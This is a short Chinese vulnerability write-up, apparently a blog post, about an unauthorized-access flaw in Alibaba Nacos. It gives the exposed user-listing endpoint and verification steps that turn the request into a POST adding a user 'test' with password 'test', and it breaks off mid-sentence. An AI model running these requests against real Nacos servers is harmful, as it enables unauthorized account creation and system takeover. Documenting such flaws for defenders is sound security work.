漏洞位置:
http://ip:port/nacos/v1/auth/users/?pageNo=1&pageSize=10
风险等级:
高危
漏洞危害:
可能泄露敏感信息并被攻击者利用造成威胁;攻击者可能直接利用样例的
漏洞进行攻击;核心数据可能被偷取。
漏洞说明:
nacos官方在github发布的
issue
中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
漏洞验证:
http://ip:port/nacos/v1/auth/users/?pageNo=1&pageSize=10
构造payload后访问抓取数据包,将数据包GET改为POST请求进行添加新用户test
http://ip:port/nacos/v1/auth/users?username=test&password=test
登录test用户,可
版权声明:本文为BeiShangBuZaiLai原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。